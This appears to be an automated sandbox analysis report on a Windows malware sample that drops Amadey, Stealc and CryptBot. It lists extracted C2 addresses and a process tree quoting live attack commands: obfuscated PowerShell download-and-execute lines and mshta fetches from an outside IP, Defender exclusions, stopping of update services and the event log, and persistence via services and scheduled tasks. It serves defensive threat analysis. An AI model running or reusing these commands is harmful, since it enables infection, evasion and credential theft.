Overview

overview

10

Static

static

3

27078da224...d3.exe

windows7-x64

10

27078da224...d3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 19:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe

  • Size

    1.8MB

  • MD5

    82d65703f59b88d8f091de327bbabce4

  • SHA1

    07580dac62ef9478a94f1a316616f15c9d0a9f13

  • SHA256

    27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3

  • SHA512

    3471a3a1acb124cce0219d9330b46549a560f0b99dc8e3ca216b449ee4a0e93d3e1f0963e725a143faca932cfc0ba804e7724b836e3c185d6fda39c03d19671f

  • SSDEEP

    49152:5BXUShjURElo/e6Lk5PfzHLR4nTsD2g02q2fMypj8xok0gPC/4KPRr6:fX9h/PPfx4nTsigA2f5pj8WXNAKI

Score
10/10
amadeycryptbotstealc9c9aa5marscredential_accessdefense_evasiondiscoveryevasionexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • Cryptbot family
    cryptbot
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealer
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    evasiontrojan
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
    evasion
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Loads dropped DLL
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:600
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
              PID:1248
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1656
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks processor information in registry
                PID:1068
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                3⤵
                  PID:4820
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:680
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  • Indicator Removal: Clear Windows Event Logs
                  PID:748
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:824
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1172
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:860
                      • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                        wmiadap.exe /F /T /R
                        3⤵
                          PID:1820
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {7FC67EFE-47B2-4DA1-8FF5-6DAD1D229B8E} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
                          3⤵
                            PID:4784
                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3432
                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:708
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService
                          2⤵
                            PID:968
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k NetworkService
                            2⤵
                              PID:236
                            • C:\Windows\System32\spoolsv.exe
                              C:\Windows\System32\spoolsv.exe
                              2⤵
                                PID:300
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                2⤵
                                  PID:1028
                                • C:\Windows\system32\taskhost.exe
                                  "taskhost.exe"
                                  2⤵
                                    PID:1104
                                  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                    2⤵
                                      PID:1280
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                      2⤵
                                        PID:2284
                                      • C:\Windows\system32\sppsvc.exe
                                        C:\Windows\system32\sppsvc.exe
                                        2⤵
                                          PID:2204
                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                          2⤵
                                            PID:3116
                                          • C:\ProgramData\Mig\Mig.exe
                                            C:\ProgramData\Mig\Mig.exe
                                            2⤵
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            • Suspicious use of SetThreadContext
                                            PID:4936
                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2752
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                              3⤵
                                                PID:3532
                                                • C:\Windows\system32\wusa.exe
                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                  4⤵
                                                  • Drops file in Windows directory
                                                  PID:3380
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                3⤵
                                                • Launches sc.exe
                                                PID:1904
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                3⤵
                                                • Launches sc.exe
                                                PID:3964
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop wuauserv
                                                3⤵
                                                • Launches sc.exe
                                                PID:3452
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop bits
                                                3⤵
                                                • Launches sc.exe
                                                PID:4120
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop dosvc
                                                3⤵
                                                • Launches sc.exe
                                                PID:4244
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                3⤵
                                                • Power Settings
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4296
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                3⤵
                                                • Power Settings
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4304
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                3⤵
                                                • Power Settings
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4316
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                3⤵
                                                • Power Settings
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4324
                                              • C:\Windows\system32\dialer.exe
                                                C:\Windows\system32\dialer.exe
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4336
                                              • C:\Windows\system32\dialer.exe
                                                C:\Windows\system32\dialer.exe
                                                3⤵
                                                  PID:4388
                                                • C:\Windows\system32\dialer.exe
                                                  dialer.exe
                                                  3⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4484
                                            • C:\Windows\system32\lsass.exe
                                              C:\Windows\system32\lsass.exe
                                              1⤵
                                                PID:488
                                              • C:\Windows\system32\lsm.exe
                                                C:\Windows\system32\lsm.exe
                                                1⤵
                                                  PID:496
                                                • C:\Windows\Explorer.EXE
                                                  C:\Windows\Explorer.EXE
                                                  1⤵
                                                    PID:1252
                                                    • C:\Users\Admin\AppData\Local\Temp\27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe"
                                                      2⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Identifies Wine through registry keys
                                                      • Loads dropped DLL
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2544
                                                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                        3⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2716
                                                        • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
                                                          4⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2956
                                                        • C:\Users\Admin\AppData\Local\Temp\1007999001\9a4a122e4f.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1007999001\9a4a122e4f.exe"
                                                          4⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Loads dropped DLL
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3028
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                            5⤵
                                                            • Uses browser remote debugging
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:3676
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fee6949758,0x7fee6949768,0x7fee6949778
                                                              6⤵
                                                                PID:3688
                                                              • C:\Windows\system32\ctfmon.exe
                                                                ctfmon.exe
                                                                6⤵
                                                                  PID:3800
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:2
                                                                  6⤵
                                                                    PID:3844
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:8
                                                                    6⤵
                                                                      PID:3860
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:8
                                                                      6⤵
                                                                        PID:3880
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:1
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        PID:4048
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:1
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        PID:4056
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1308 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:2
                                                                        6⤵
                                                                          PID:3360
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1396 --field-trial-handle=1200,i,1701957059154864045,11443161738916373190,131072 /prefetch:1
                                                                          6⤵
                                                                          • Uses browser remote debugging
                                                                          PID:676
                                                                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4536
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:4604
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 952
                                                                        5⤵
                                                                        • Loads dropped DLL
                                                                        • Program crash
                                                                        PID:4868
                                                                    • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2784
                                                                      • C:\Windows\system32\wscript.exe
                                                                        "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                                        5⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1636
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                          6⤵
                                                                          • Blocklisted process makes network request
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:316
                                                                          • C:\Windows\System32\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                                            7⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2136
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                              8⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2484
                                                                              • C:\Windows\system32\mshta.exe
                                                                                mshta http://176.113.115.178/Windows-Update
                                                                                9⤵
                                                                                • Blocklisted process makes network request
                                                                                • Modifies Internet Explorer settings
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1892
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                  10⤵
                                                                                  • UAC bypass
                                                                                  • Blocklisted process makes network request
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2868
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                                    11⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2796
                                                                                  • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                                    11⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3500
                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                      12⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Drops file in System32 directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1792
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                      12⤵
                                                                                        PID:1344
                                                                                        • C:\Windows\system32\wusa.exe
                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          13⤵
                                                                                          • Drops file in Windows directory
                                                                                          PID:4076
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3476
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4036
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4072
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3484
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:2644
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                        12⤵
                                                                                        • Power Settings
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3472
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                        12⤵
                                                                                        • Power Settings
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2784
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                        12⤵
                                                                                        • Power Settings
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2328
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                        12⤵
                                                                                        • Power Settings
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1092
                                                                                      • C:\Windows\system32\dialer.exe
                                                                                        C:\Windows\system32\dialer.exe
                                                                                        12⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1688
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe delete "LIB"
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3436
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3364
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4720
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe start "LIB"
                                                                                        12⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4728
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                            6⤵
                                                                            • Blocklisted process makes network request
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
